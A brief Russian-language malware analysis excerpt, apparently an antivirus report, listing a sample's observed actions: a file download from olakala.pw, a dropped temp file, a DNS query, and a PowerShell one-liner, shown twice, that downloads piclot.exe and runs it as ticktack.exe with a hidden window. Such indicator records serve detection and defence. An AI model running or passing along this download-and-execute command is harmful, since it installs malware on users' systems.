Техническая информация
- http://olakala.pw/piclot.exe как %temp%\ticktack.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell(New-Object System.Net.WebClient).DownloadFile('http://olakala.pw/piclot.exe','%TEMP%\ticktack.exe');Start-Process '%TEMP%\ticktack.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1408
- %TEMP%\1376880.cvr
- DNS ASK ol##ala.pw
- '<SYSTEM32>\cmd.exe' /c PowerShell(New-Object System.Net.WebClient).DownloadFile('http://olakala.pw/piclot.exe','%TEMP%\ticktack.exe');Start-Process '%TEMP%\ticktack.exe';' (со скрытым окном)